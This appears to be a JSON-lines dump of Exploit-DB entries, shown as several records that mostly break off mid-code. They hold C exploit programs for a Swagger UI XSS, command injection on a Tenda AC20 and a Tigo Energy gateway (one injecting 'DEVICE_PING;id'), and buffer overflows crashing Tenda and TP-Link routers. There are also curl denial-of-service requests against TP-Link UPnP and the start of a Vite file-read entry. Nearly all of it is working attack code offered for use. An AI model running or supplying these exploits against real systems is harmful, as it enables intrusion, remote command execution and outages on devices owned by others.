"2025-04-08T00:00:00+00:00"} {"id": "1d627ab3210a4ec436b7", "text": "Swagger UI 1.0.3 - Cross-Site Scripting (XSS)\n\n/*\n * Author : Byte Reaper\n * Telegram : @ByteReaper0\n * CVE : CVE-2025-8191\n * Title : Swagger UI 1.0.3 - Cross-Site Scripting (XSS)\n * Description : CVE-2025-8191, a vulnerability in the Swagger UI service due to poor description parameter filtering, leading to command execution on a remote server.\n *\n */\n\n#include \n#include \n#include \n#include \"argparse.h\"\n#include \n\nint portSel = 0;\nint portServerSel = 0;\nint selectFile = 0;\nconst char *targetUrl = NULL;\nconst char *cookies = NULL;\nconst char *server = NULL;\nconst char *yourFile = NULL;\nconst char *payloadFile = \"xss.json\";\nint targetPort = 0;\nint yourPort = 0;\nint verbose = 0;\nint useCookies = 0;\nstruct Mem\n{\n char *buffer;\n size_t len;\n};\n\n\nvoid exitAssembly()\n{\n __asm__ volatile\n (\n \"mov $231, %%rax\\n\\t\"\n \"xor %%rdi, %%rdi\\n\\t\"\n \"syscall\\n\\t\"\n :\n :\n :\"rax\",\n \"rdi\"\n );\n}\nsize_t write_cb(void *ptr,\n size_t size, size_t nmemb,\n void *userdata)\n{\n size_t total = size * nmemb;\n struct Mem *m = (struct Mem *)userdata;\n char *tmp = realloc(m->buffer, m->len + total + 1);\n if (tmp == NULL)\n {\n printf(\"\\e[1;31m[-] Failed to allocate memory!\\e[0m\\n\");\n exitAssembly();\n }\n m->buffer = tmp;\n memcpy(&(m->buffer[m->len]), ptr, total);\n m->len += total;\n m->buffer[m->len] = '\\0';\n return total;\n}\nvoid createFile(const char *filename,\n const char *server)\n{\n FILE *f = fopen(filename, \"w\");\n if (f == NULL)\n {\n printf(\"\\e[1;31m[-] Error Create file (xss.json)!\\e[0m\\n\");\n exitAssembly();\n }\n\n char payloadBuf[2048];\n int lenFile = snprintf(\n payloadBuf,\n sizeof(payloadBuf),\n \"{\\n\"\n \" \\\"swagger\\\": \\\"2.0\\\",\\n\"\n \" \\\"info\\\": {\\n\"\n \" \\\"version\\\": \\\"1.0.0\\\",\\n\"\n \" \\\"title\\\": \\\"XSS Injection Demo\\\",\\n\"\n \" \\\"description\\\": \\\"\\\"\\n\"\n \" },\\n\"\n \" \\\"paths\\\": {}\\n\"\n \"}\",\n server\n );\n\n if (lenFile <= 0 || lenFile >= sizeof(payloadBuf))\n {\n printf(\"\\e[1;31m[-] File payload too large!\\e[0m\\n\");\n fclose(f);\n exitAssembly();\n }\n fwrite(payloadBuf,\n 1,\n lenFile,\n f);\n fclose(f);\n printf(\"\\e[1;34m[+] File name: %s\\e[0m\\n\",\n filename);\n printf(\"\\e[1;34m[+] File created successfully.\\e[0m\\n\");\n printf(\"\\e[1;35m============================= [PAYLOAD] =============================\\e[0m\\n\");\n printf(\"\\e[1;34m[+] Payload content :\\n%s\\e[0m\\n\",\n payloadBuf);\n printf(\"\\e[1;35m====================================================================\\e[0m\\n\");\n\n}\nvoid sendRequest(const char *baseUrl,\n int targetPort,\n const char *server,\n const char *payloadFile)\n{\n const char *filename = \"xss.json\";\n createFile(filename, server);\n CURL *curl = curl_easy_init();\n CURLcode res;\n char full[4000];\n if (curl == NULL)\n {\n printf(\"\\e[1;31m[-] Error Create Object CURL !\\e[0m\\n\");\n exitAssembly();\n }\n struct Mem server_Rsponse =\n {\n NULL,\n 0\n };\n server_Rsponse.buffer = NULL ;\n server_Rsponse.len = 0;\n if (curl)\n {\n\n if (portSel)\n {\n int len1 = snprintf(full,\n sizeof(full),\n \"%s:%d/swagger-ui/index.html?configUrl=%s/%s\",\n baseUrl,\n targetPort,\n server,\n payloadFile);\n if (len1 < 0 || len1 >= (int)sizeof(full))\n {\n printf(\"\\e[1;31m[-] URL is Long !\\e[0m\\n\");\n printf(\"\\e[1;31m[-] FULL URL Len : %d\\e[0m\\n\", len1);\n exitAssembly();\n }\n }\n if (portServerSel)\n {\n int len2 = snprintf(full,\n sizeof(full),\n \"%s/swagger-ui/index.html?configUrl=%s:%d/%s\",\n baseUrl,\n server,\n yourPort,\n payloadFile);\n\n if (len2 < 0 || len2 >= (int)sizeof(full))\n {\n printf(\"\\e[1;31m[-] URL is Long !\\e[0m\\n\");\n printf(\"\\e[1;31m[-] FULL URL Len : %d\\e[0m\\n\", len2);\n exitAssembly();\n }\n\n }\n if (selectFile)\n {\n int len3 = snprintf(full,\n s", "cve_id": "CVE-2025-8191", "source": "exploitdb", "timestamp": "2025-08-03T00:00:00+00:00"} {"id": "b6e7aae151f8b432f5bb", "text": "Tenda AC20 16.03.08.12 - Command Injection\n\n/*\n * Exploit Title : Tenda AC20 16.03.08.12 - Command Injection\n * Author : Byte Reaper\n * CVE : CVE-2025-9090\n * Description: A vulnerability was identified in Tenda AC20 16.03.08.12. Affected is the function websFormDefine of the file /goform/telnet of the component Telnet Service.\n * target endpoint : /goform/telnet\n * place in service : http://\n * full format target url : http:///goform/telnet\n * Exploitation plan:\n * 1. Build full URL\n * 2. Prepare POST data (Sleep + full url + libcurl function)\n * 3. Send POST request via CURL\n * 4. Measure response: HTTP code, telnet access (23), error word (not found)\n * 5. Determine success & finalize exploit\n */\n\n#include \n#include \"argparse.h\"\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#define MAX_RESPONSE (50 * 1024 * 1024)\n#define URL 2400\n#define BUFFER 4500\nconst char *ipT = NULL;\nconst char *cookies = NULL;\nint loopF = 0;\nint verbose = 0;\nint fileCookies = 0;\nvoid exit64bit()\n{\n\tfflush(NULL);\n\t__asm__ volatile\n\t(\n \"syscall\\n\\t\"\n :\n : \"A\"(0x3C),\n \"D\"(0)\n : \"rcx\",\n \"r11\",\n \"memory\"\n );\n fflush(NULL);\n}\n\nstruct Mem\n{\n char *buffer;\n size_t len;\n};\nsize_t write_cb(void *ptr,\n size_t size,\n size_t nmemb,\n void *userdata)\n{\n\tif (!userdata)\n\t{\n\t\treturn 0;\n\t}\n if (size && nmemb > SIZE_MAX / size)\n {\n fprintf(stderr, \"\\e[0;31m[-] size * nmemb overflow !\\e[0m\\n\");\n return 0;\n }\n size_t total = size * nmemb;\n struct Mem *m = (struct Mem *)userdata;\n if (total > MAX_RESPONSE || (m->len + total + 1) > MAX_RESPONSE)\n {\n fprintf(stderr, \"\\e[0;31m[-] Response too large or would exceed MAX_RESPONSE !\\e[0m\\n\");\n return 0;\n }\n char *tmp = realloc(m->buffer, m->len + total + 1);\n if (tmp == NULL)\n {\n fprintf(stderr, \"\\e[1;31m[-] Failed to allocate memory!\\e[0m\\n\");\n exit64bit();\n }\n m->buffer = tmp;\n memcpy(&(m->buffer[m->len]), ptr, total);\n m->len += total;\n m->buffer[m->len] = '\\0';\n return total;\n}\n\nint checkLen(int len, char *buf, size_t bufcap)\n{\n if (len < 0 || (size_t)len >= bufcap)\n {\n printf(\"\\e[0;31m[-] Len is Long ! \\e[0m\\n\");\n printf(\"\\e[0;31m[-] Len %d\\e[0m\\n\", len);\n return 1;\n }\n else\n {\n printf(\"\\e[0;34m[+] Len Is Not Long.\\e[0m\\n\");\n return 0;\n\n }\n return 0;\n}\n\nvoid cleanObject(CURL *c, struct curl_slist *h, char *r, size_t l)\n{\n\n\tprintf(\"\\e[0;33m[+] Clean Headers...\\e[0m\\n\");\n\tif (h != NULL)\n {\n \tcurl_slist_free_all(h);\n }\n if (c != NULL)\n {\n \tcurl_easy_cleanup(c);\n }\n printf(\"\\e[0;33m[+] Clean CURL...\\e[0m\\n\");\n if (r != NULL)\n {\n \tfree(r);\n \tr = NULL;\n \tl = 0;\n }\n printf(\"\\e[0;33m[+] Clean response buffer and len...\\e[0m\\n\");\n printf(\"\\e[0;31m[+] Exit ....\\n\");\n}\nint sleepSocket()\n{\n\tstatic int current = 2;\n\tint timeout = current;\n\tprintf(\"\\e[0;34m[+] Timeout Socket : %d\\n\", timeout);\n\tcurrent++;\n\tif (current > 6)\n\t{\n\t\tcurrent = 2;\n\t}\n\treturn timeout;\n}\nint connectionTelnet(const char *ip)\n{\n\tint ports[] =\n\t{\n\t\t23,\n\t\t2323\n\t};\n\tint num_ports = sizeof(ports) / sizeof(ports[0]);\n\tfor (int i = 0; i < num_ports; i++)\n\t{\n\t\tprintf(\"\\e[0;36m[+] target PORT Connection telnet : %d\\e[0m\\n\", ports[i]);\n\t\tprintf(\"\\e[0;36m[+] Try Connection in port : %d\\e[0m\\n\", ports[i]);\n\t\tint s;\n\t\tchar buffer[BUFFER];\n\t\tstruct sockaddr_in server;\n\t\ts = socket(AF_INET, SOCK_STREAM, 0);\n\t\tif (s < 0)\n\t\t{\n\t\t\tperror(\"\\e[0;31m[-] Error Create Socket !\\e[0m\\n\");\n\t\t\treturn -1;\n\t\t}\n\t\tserver.sin_addr.s_addr = inet_addr(ip);\n\t server.sin_family = AF_INET;\n\t server.sin_port = htons(ports[i]);\n\t struct timeval timeout;\n\n\t int value3 = sleepSocket();\n\t timeout.tv_sec = value3;\n\t\ttimeout.tv_usec = 0;\n\t if (setsockopt(s,\n\t \tSOL_SOCKET,\n\t \tSO_RCVTIMEO,\n\t \t(const char*)&timeout,\n\t \tsizeof(timeout)) < 0)\n\t {\n\t \tperror(\"\\e[0;31m[-] setsockopt() Failed !\\e[0m\\n\");\n\t \texit64bit();\n\t }\n\t printf(\"\\e[0;33m[+] Timeout Connection socket ...\\e[0m\\n\");\n\n\t if (connect(s,\n\t \t(struct sockaddr *)&server,\n\t \tsizeof(server)) < 0)\n\t {\n\t \tperror(\"\\e[0;31m[-] Connect failed in Target Ip.\\e[0m\\n\");\n\t \tclose(s);\n\t \tcontinue;\n\t }\n\t printf(\"[+] Connection Success in server.\\e[0m\\n\");\n\t char banner[256];\n\t\tint n = recv(s,\n\t\t\tbanner,\n\t\t\tsizeof(banner)-1,\n\t\t\t0);\n\t\tif (n > 0)\n\t\t{\n\t\t banner[n] = '\\0';\n\t\t printf(\"\\e[0;36m[+] Telnet Banner: %s\\e[0m\\n\", banner);\n\t\t}\n\n\t close(s);\n\t if (verbose)\n\t {\n\t \tprintf(\"\\e[0;33m[+] Close Socket...\\e[0m\\n\");\n\t }\n\t return ports[i];\n\t}\n return -1;\n}\nint systemCommand(const char *ip)\n{\n\tpid_t pid;\n\tprintf(\"\\e[0;37m[+] Before fork (PID : %d)\\e[0m\\n\", getpid());\n\tpid = fork();\n\tif (pid < 0)\n\t{\n\t\tfprintf(stderr, \"\\e[0;", "cve_id": "CVE-2025-9090", "source": "exploitdb", "timestamp": "2025-08-18T00:00:00+00:00"} {"id": "f3d229575b9b25f9a666", "text": "Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow\n\n/*\n * Title : Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow\n * Author : Byte Reaper\n * Telegram : @ByteReaper0\n * CVE : CVE-2025-7795\n * Vulnerability : Buffer Overflow\n * Description :\n * A buffer overflow vulnerability affecting certain Tenda routers,\n * exploitable via an unauthenticated POST request to an unprotected endpoint, leading to service crash.\n */\n\n#include \n#include \n#include \n#include \"argparse.h\"\n#include \n#include \n#include \n#include \n\n#define FULL_URL 2500\n#define POST_DATA 10000\n\nconst char *targetUrl = NULL;\nconst char *targetip = NULL;\nint selectIp = 0;\nint selectUrl = 0;\nint verbose = 0;\nint showOne = 0;\nchar postData[POST_DATA];\n\nstruct Mem\n{\n char *buffer;\n size_t len;\n};\n\nsize_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)\n{\n size_t total = size * nmemb;\n struct Mem *m = (struct Mem *)userdata;\n char *tmp = realloc(m->buffer, m->len + total + 1);\n if (!tmp) return 0;\n m->buffer = tmp;\n memcpy(&(m->buffer[m->len]), ptr, total);\n m->len += total;\n m->buffer[m->len] = '\\0';\n return total;\n}\n\nvoid pingPacket()\n{\n int pid = fork();\n printf(\"\\n============================================== [Ping] ==============================================\\n\");\n if (pid < 0)\n {\n perror(\"\\e[1;31m[-] Fork Failed!\\e[0m\");\n exit(1);\n }\n if (pid == 0)\n {\n printf(\"\\e[1;32m[+] Child Process (Ping) -> PID: %d\\e[0m\\n\",\n getpid());\n char *const argv[] = { \"/bin/ping\",\n \"-c\",\n \"3\",\n (char *)targetip,\n NULL };\n char *const envp[] = { NULL };\n __asm__ volatile\n (\n \"mov $59, %%rax\\n\\t\"\n \"mov %[prog], %%rdi\\n\\t\"\n \"mov %[argv], %%rsi\\n\\t\"\n \"mov %[envp], %%rdx\\n\\t\"\n \"syscall\\n\\t\"\n \"mov $60, %%rax\\n\\t\"\n \"xor %%rdi, %%rdi\\n\\t\"\n \"syscall\\n\\t\"\n :\n : [prog] \"r\" (argv[0]),\n [argv] \"r\" (argv),\n [envp] \"r\" (envp)\n : \"rax\", \"rdi\", \"rsi\", \"rdx\"\n );\n }\n else\n {\n printf(\"\\e[1;32m[+] Main PID : %d\\e[0m\\n\",\n getpid());\n int status;\n waitpid(pid,\n &status,\n 0);\n if (WIFEXITED(status))\n {\n int code = WEXITSTATUS(status);\n printf(\"\\e[1;33m[+] Ping exited with code: %d\\e[0m\\n\",\n code);\n if (code == 0)\n {\n printf(\"\\e[1;31m[-] Successfully confirmed connection via ping!\\e[0m\\n\");\n printf(\"\\e[1;31m[-] The server is still working, please try again!\\n\\e[0m\");\n }\n else\n {\n printf(\"\\e[1;34m[+] The server is not responding to the ping request!\\e[0m\\n\");\n printf(\"\\e[1;34m[+] CVE-2025-7795: Vulnerability confirmed! Server is down.\\e[0m\\n\");\n }\n }\n }\n printf(\"\\n============================================================================================\\e[0m\\n\");\n}\n\nvoid sendRequest()\n{\n CURL *c = curl_easy_init();\n CURLcode res;\n char full[FULL_URL];\n struct Mem response = {NULL, 0};\n if (!c) {\n printf(\"\\e[1;31m[-] Error Create Object Curl !\\e[0m\\n\");\n exit(EXIT_FAILURE);\n }\n if (targetip) selectIp = 1;\n if (targetUrl) selectUrl = 1;\n if (selectIp)\n {\n snprintf(full,\n sizeof(full),\n \"http://%s/goform/fromP2pListFilter\",\n targetip);\n }\n if (selectUrl)\n {\n snprintf(full,\n sizeof(full),\n \"%s/goform/fromP2pListFilter\",\n targetUrl);\n }\n int rounds = 5;\n int baseLen = 3500, step = 1000;\n showOne = 1;\n for (int i = 0; i < rounds; i++)\n {\n int len = baseLen + i * step;\n if (len + 6 >= sizeof(postData)) break;\n snprintf(postData, sizeof(postData), \"list=\");\n memset(postData + 5, 'A', len);\n postData[5 + len] = '\\0';\n printf(\"\\e[1;34m[%d] Iteration %d - Length: %d\\e[0m\\n\",\n i+1,\n i+1,\n len);\n if (verbose)\n {\n printf(\"\\e[1;35m\\n====================================================================[Post Data] ====================================================================\\e[0m\\n\");\n printf(\"%s\\e[0m\\n\\n\", postData);\n printf(\"\\e[1;35m====================================================================[Post Data] ====================================================================\\e[0m\\n\");\n }\n\n curl_easy_reset(c);\n curl_easy_setopt(c,\n CURLOPT_URL,\n full);\n curl_", "cve_id": "CVE-2025-7795", "source": "exploitdb", "timestamp": "2025-07-22T00:00:00+00:00"} {"id": "3bdb5a333178cb7652d8", "text": "Tigo Energy Cloud Connect Advanced (CCA) 4.0.1 - Command Injection\n\n/*\n * Title : Tigo Energy Cloud Connect Advanced (CCA) 4.0.1 - Command Injection\n * Author : Byte Reaper\n * CVE : CVE-2025-7769\n */\n\n\n#include \n#include \n#include \n#include \"argparse.h\"\n#include \n#include \n#include \n#define FULL_URL 2500\n#define POST_PAYLOAD 5500\n\n\nconst char *baseurl = NULL;\nconst char *cookies = NULL;\nconst char *ip = NULL;\nconst char *caFile = NULL;\nint caS = 0;\nconst char *nameFileC = NULL;\nint port = 0;\nint uC =0;\nint verbose = 0;\n\n\nvoid exitSyscall()\n{\n __asm__ volatile\n (\n \"mov $0x3C, %%rax\\n\\t\"\n \"xor %%rdi, %%rdi\\n\\t\"\n \"syscall\\n\\t\"\n :\n :\n :\"rax\",\n \"rdi\"\n );\n}\n\nint checkLen(int len, char *buf, size_t bufcap)\n{\n if (len < 0 || (size_t)len >= bufcap)\n {\n printf(\"\\e[0;31m[-] Len is Long ! \\e[0m\\n\");\n printf(\"\\e[0;31m[-] Len %d\\e[0m\\n\", len);\n exitSyscall();\n return 1;\n }\n else\n {\n printf(\"\\e[0;34m[+] Len Is Not Long (%d).\\e[0m\\n\",len);\n return 0;\n\n }\n return 0;\n}\nvoid nanoSleep(void)\n{\n struct timespec ob;\n ob.tv_sec = 0;\n ob.tv_nsec = 500 * 1000 * 1000;\n\n __asm__ volatile\n (\n \"mov $230, %%rax\\n\\t\"\n \"mov $1, %%rdi\\n\\t\"\n \"xor %%rsi, %%rsi\\n\\t\"\n \"mov %0, %%rdx\\n\\t\"\n \"xor %%r10, %%r10\\n\\t\"\n \"syscall\\n\\t\"\n :\n : \"r\"(&ob)\n : \"rax\",\n \"rdi\",\n \"rsi\",\n \"rdx\",\n \"r10\",\n \"memory\"\n );\n}\nstruct Mem\n{\n char *buffer;\n size_t len;\n};\nsize_t write_cb(void *ptr,\n size_t size,\n size_t nmemb,\n void *userdata)\n{\n size_t total = size * nmemb;\n struct Mem *m = (struct Mem *)userdata;\n char *tmp = realloc(m->buffer, m->len + total + 1);\n if (tmp == NULL)\n {\n fprintf(stderr, \"\\e[1;31m[-] Failed to allocate memory!\\e[0m\\n\");\n exitSyscall();\n }\n m->buffer = tmp;\n memcpy(&(m->buffer[m->len]), ptr, total);\n m->len += total;\n m->buffer[m->len] = '\\0';\n return total;\n}\nconst char *wordInjection[] =\n{\n\t//Result ID\n\t\"admin\",\n\t\"root\",\n\t\"groups=0\",\n\t\"gid=0\",\n\t\"uid=1000\",\n\t\"gid=1000\",\n\t\"groups=1000\",\n\t\"bluetooth\",\n\t//Result ls\n\t\".txt\",\n\t\".py\",\n\t\".php\",\n\t\".sh\",\n\t\".js\",\n\t//Result pwd\n\t\"home\",\n\t\"Documents\",\n\t\"Desktop\",\n\t\"Downloads\",\n\t\"Public\",\n\t\"Videos\",\n\tNULL\n};\nvoid postRequest(const char *baseurl, const char *ip, int port)\n{\n\tchar full[FULL_URL];\n\tCURL *curl = curl_easy_init();\n\tCURLcode res;\n\n\tif (curl == NULL)\n\t{\n\t\tprintf(\"\\e[0;31m[-] Error Create Object CURL !\\e[0m\\n\");\n\t\tprintf(\"\\e[0;31m[-] Check Connection ...\\e[0m\\n\" );\n\t\tconst char *googleIp = \"142.251.37.46\";\n\t\tprintf(\"\\e[0;31m[-] Ping Command (ip = %s)\\e[0m\\n\", googleIp);\n\t\tconst char *cP = \"/bin/ping\";\n \tconst char *av[] = {\n \t\t\t\t\t\"ping\",\n \t\t\t\t\t\"-c\",\n \t\t\t\t\t\"5\",\n \t\t\t\t\t\"google.com\",\n \t\t\t\t\tNULL\n \t\t\t\t};\n\t\tconst char *ep[] =\n\t\t\t\t{\n\t\t\t\t\tNULL\n\t\t\t\t};\n\t\t__asm__ volatile\n\t\t(\n\t\t\t\"MOV $59, %%rax\\n\\t\"\n\t\t\t\"MOV %[cmd], %%rdi\\n\\t\"\n\t\t\t\"MOV %[argv], %%rsi\\n\\t\"\n\t\t\t\"MOV %[envp], %%rdx\\n\\t\"\n\t\t\t\"syscall\\n\\t\"\n\t\t\t\".1:\\n\\t\"\n\t\t\t\"MOV $0x3C, %%rax\\n\\t\"\n\t\t\t\"XOR %%rdi, %%rdi\\n\\t\"\n\t\t\t\"syscall\\n\\t\"\n\t\t\t:\n\t\t\t: [cmd] \"r\" (cP),\n\t\t\t [argv] \"r\" (av),\n\t\t\t [envp] \"r\"(ep)\n \t\t\t:\"rax\",\n \t\t\t \"rdi\",\n \t\t\t \"rsi\",\n \t\t\t \"rdx\"\n\t\t);\n\t}\n\tif (port != 0)\n\t{\n\t\tgoto ipPT;\n\t}\n\tprintf(\"\\e[0;31m[-] Port Not Select.\\n\");\n\tif (ip)\n\t{\n\t\tunsigned long ipformat ;\n\t\tipformat = inet_addr(ip);\n\t\tif (ipformat == INADDR_NONE || ipformat == -1)\n\t\t{\n\t\t\tprintf(\"\\e[0;31m[-] Invalid IP address string.\\e[0m\\n\");\n\t\t\texitSyscall();\n\t\t}\n\t\tint lenIp = snprintf(full, sizeof(full),\n\t\t\t\t\t\t\"http://%s/cgi-bin/mobile_api\",\n\t\t\t\t\t\tip);\n\t if (checkLen(lenIp,full, sizeof(full)) == 1)\n\t\t{\n\t\t\tprintf(\"\\e[0;31m[-] Len FUll URL (IP) Is Long !\\e[0m\\n\");\n\t\t\tprintf(\"\\e[0;31m[-] Len : %d\\n\",lenIp);\n\t\t\texitSyscall();\n\t\t}\n\t\tgoto done;\n\t\tipPT:\n\n\t\t\tprintf(\"\\e[0;36m[+] PORT : %d\\e[0m\\n\", port);\n\t\t\tint lenIpPT = snprintf(full, sizeof(full),\n\t\t\t\t\t\t\"http://%s:%d/cgi-bin/mobile_api\",\n\t\t\t\t\t\tip,\n\t\t\t\t\t\tport);\n\t\t\tif (checkLen(lenIpPT,full, sizeof(full)) == 1)\n\t\t\t{\n\t\t\t\tprintf(\"\\e[0;31m[-] Len FUll URL (IP And Port) Is Long !\\e[0m\\n\");\n\t\t\t\tprintf(\"\\e[0;31m[-] Len : %d\\e[0m\\n\",lenIpPT);\n\t\t\t\texitSyscall();\n\t\t\t}\n\n\n\n\t}\n\telse if (baseurl != NULL)\n\t{\n\t\tint lenUrl = snprintf(full, sizeof(full), \"%s/cgi-bin/mobile_api\", baseurl);\n\t\tif (checkLen(lenUrl,full, sizeof(full)) == 1)\n\t\t{\n\t\t\tprintf(\"\\e[0;31m[-] Len FUll URL (URL and EndPoint) Is Long !\\e[0m\\n\");\n\t\t\tprintf(\"\\e[0;31m[-] Len : %d\\e[0m\\n\",lenUrl);\n\t\t\texitSyscall();\n\t\t}\n\n\t}\n\tprintf(\"\\e[0;36m[+] Final Full URL Format : %s\\e[0m\\n\", full);\n\tprintf(\"\\e[0;36m[+] Preparation POST Payload...\\e[0m\\n\");\n\tprintf(\"\\e[0;36m[+] Command Payload Injection (cmd = id)\\e[0m\\n\");\n\tchar post[POST_PAYLOAD];\n\n\tsnprintf(post,\n\t\t\tsizeof(post),\n\t\t\t\"{\\n\\t\\\"cmd\\\": \\\"DEVICE_PING;id\\\",\\n\\t\\\"dev\\\": 2,\\n\\t\\\"ver\\\": 1 \\n}\");\n\tprintf(\"\\e[0;34m[+] POST DATA ", "cve_id": "CVE-2025-7769", "source": "exploitdb", "timestamp": "2025-08-11T00:00:00+00:00"} {"id": "6d752c15576c620bb666", "text": "TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption\n\n* Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption\n* Date: 11/24/2024\n* Exploit Author: Mohamed Maatallah\n* Vendor Homepage: https://www.tp-link.com\n* Version: TT_V6.2.1021 (VN020-F3v(T))\n* Tested on: VN020-F3v(T) Router (Hardware Version 1.0)\n* CVE: CVE-2024-12344\n* Category: Remote\n\n* Description:\n* A critical buffer overflow and memory corruption vulnerability was discovered in TP-Link VN020-F3v(T) router's FTP server implementation. The vulnerability stems from improper input validation of the USER command, allowing unauthenticated attackers to trigger various failure modes through payload size manipulation:\n\n* 1. 1100 bytes - Delayed crash (5-10 seconds)\n* 2. 1450 bytes - Immediate crash\n* 3. >1450 bytes - Undefined behavior/state corruption\n\n* Proof of Concept: (attached full c file)\n * Compilation Instructions (Visual Studio):\n * ---------------------------------------\n * 1. Open Visual Studio\n * 2. Create a new C Console Application\n * 3. Add these additional dependencies to project settings:\n * - ws2_32.lib\n * - iphlpapi.lib\n * 4. Ensure Windows SDK is installed\n * 5. Set Platform Toolset to latest v143 or v142\n * 6. Compile in Release or Debug mode\n *\n * Disclaimer:\n * ----------\n * This proof of concept is for educational and research purposes only.\n * Unauthorized testing without explicit permission is unethical and illegal.\n */\n\n#define _CRT_SECURE_NO_WARNINGS\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#pragma comment(lib, \"ws2_32.lib\")\n#pragma comment(lib, \"iphlpapi.lib\")\n\n // Target configuration - MODIFY BEFORE TESTING\n#define DEST_IP \"192.168.1.1\" // IP of target FTP server\n#define DEST_PORT 21 // Standard FTP port\n#define PING_TIMEOUT_MS 1000 // Network timeout\n#define MAX_PING_RETRIES 5 // Connectivity check attempts\n\n// 1450: Instant\n// 1100: Delayed\n#define CRASH_STRING_LENGTH 1450 // Exact number of 'A's triggering instantcrash\n#define TOTAL_PAYLOAD_LENGTH (CRASH_STRING_LENGTH + 5 + 2) // USER + As + \\r\\n\n\ntypedef struct {\n HANDLE icmp_handle;\n IPAddr target_addr;\n LPVOID reply_buffer;\n DWORD reply_size;\n} ping_context_t;\n\nvoid log_msg(const char* prefix, const char* msg) {\n SYSTEMTIME st;\n GetLocalTime(&st);\n printf(\"[%02d:%02d:%02d] %s %s\\n\", st.wHour, st.wMinute, st.wSecond, prefix, msg);\n}\n\nvoid hexdump(const char* desc, const void* addr, const int len) {\n int i;\n unsigned char buff[17];\n const unsigned char* pc = (const unsigned char*)addr;\n\n if (desc != NULL)\n printf(\"%s:\\n\", desc);\n\n for (i = 0; i < len; i++) {\n if ((i % 16) == 0) {\n if (i != 0)\n printf(\" %s\\n\", buff);\n printf(\" %04x \", i);\n }\n\n printf(\" %02x\", pc[i]);\n\n if ((pc[i] < 0x20) || (pc[i] > 0x7e))\n buff[i % 16] = '.';\n else\n buff[i % 16] = pc[i];\n buff[(i % 16) + 1] = '\\0';\n }\n\n while ((i % 16) != 0) {\n printf(\" \");\n i++;\n }\n\n printf(\" %s\\n\", buff);\n}\n\nBOOL check_connectivity(ping_context_t* ctx) {\n char send_buf[32] = { 0 };\n return IcmpSendEcho(ctx->icmp_handle, ctx->target_addr, send_buf, sizeof(send_buf),\n NULL, ctx->reply_buffer, ctx->reply_size, PING_TIMEOUT_MS) > 0;\n}\n\nchar* generate_exact_crash_payload() {\n char* payload = (char*)malloc(TOTAL_PAYLOAD_LENGTH + 1); // +1 for null terminator\n if (!payload) {\n log_msg(\"[-]\", \"Failed to allocate payload memory\");\n return NULL;\n }\n\n // Construct the exact payload that causes crash\n strcpy(payload, \"USER \"); // 5 bytes\n memset(payload + 5, 'A', CRASH_STRING_LENGTH); // 1450 'A's\n memcpy(payload + 5 + CRASH_STRING_LENGTH, \"\\r\\n\", 2); // 2 bytes\n payload[TOTAL_PAYLOAD_LENGTH] = '\\0';\n\n char debug_msg[100];\n snprintf(debug_msg, sizeof(debug_msg), \"Generated payload of length %d ('A's + 5 byte prefix + 2 byte suffix)\",\n TOTAL_PAYLOAD_LENGTH);\n log_msg(\"[*]\", debug_msg);\n\n return payload;\n}\n\nBOOL send_crash_payload(const char* target_ip, uint16_t target_port) {\n WSADATA wsa;\n SOCKET sock = INVALID_SOCKET;\n struct sockaddr_in server;\n char server_reply[2048];\n int recv_size;\n ping_context_t ping_ctx = { 0 };\n BOOL success = FALSE;\n\n // Initialize Winsock\n if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {\n log_msg(\"[-]\", \"Winsock initialization failed\");\n return FALSE;\n }\n\n // Setup ICMP for connectivity monitoring\n ping_ctx.icmp_handle = IcmpCreateFile();\n ping_ctx.reply_size = sizeof(ICMP_ECHO_REPLY) + 32;\n ping_ctx.reply_buffer = malloc(ping_ctx.reply_size);\n inet_pton(AF_INET, target_ip, &ping_ctx.target_addr);\n\n // Create socket\n sock = socket(AF_INET, SOCK_STREAM, 0);\n", "cve_id": "CVE-2024-12344", "source": "exploitdb", "timestamp": "2025-04-17T00:00:00+00:00"} {"id": "e7d56f37d7a87ee9e001", "text": "TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)\n\n# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)\n# Date: 10/22/2024\n# Exploit Author: Mohamed Maatallah\n# Vendor Homepage: https://www.tp-link.com\n# Version: TT_V6.2.1021 (VN020-F3v(T))\n# Tested on: VN020-F3v(T) Router (Hardware Version 1.0)\n# CVE: CVE-2024-12342\n\n\nDescription:\nTwo critical vulnerabilities discovered in TP-Link VN020-F3v(T) router's\nUPnP implementation, affecting the WANIPConnection service. The\nvulnerabilities allow unauthenticated attackers to cause denial of service\nand potential memory corruption through malformed SOAP requests.\n\nProof of Concept 1 (Missing Parameters DoS):\n\ncurl -v -X POST \"http://192.168.1.1:5431/control/WANIPConnection\" \\\n-H \"Content-Type: text/xml\" \\\n-H \"SOAPAction:\n\\\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\\\"\" \\\n-d '\n\n\nhello\n'\n\nProof of Concept 2 (Memory Corruption):\n\ncurl -v -X POST \"http://192.168.1.1:5431/control/WANIPConnection\" \\\n -H \"Content-Type: text/xml\" \\\n -H \"SOAPAction:\n\\\"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\\\"\" \\\n -d '\n\n \n \n '\"$(perl -e 'print \"%x\" x\n10000;')\"'\n \n \n'", "cve_id": "CVE-2024-12342", "source": "exploitdb", "timestamp": "2025-04-17T00:00:00+00:00"} {"id": "0967667cbc4115db2b74", "text": "Vite 6.2.2 - Arbitrary File Read\n\n# Exploit Title: Vite Arbitrary File Read - CVE-2025-30208\n# Date: 2025-04-03\n# Exploit Author: Sheikh Mohammad Hasan (https://github.com/4m3rr0r)\n# Vendor Homepage: https://vitejs.dev/\n# Software Link: https://github.com/vitejs/vite\n# Version: <= 6.2.2, <= 6.1.1, <= 6.0.11, <= 5.4.14, <= 4.5.9\n# Tested on: Ubuntu\n# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-30208\n# https://github.com/advisories/GHSA-x574-m823-4x7w\n# CVE : CVE-2025-30208\n\n\"\"\"\n################\n# Description #\n################\n\nVite, a provider of 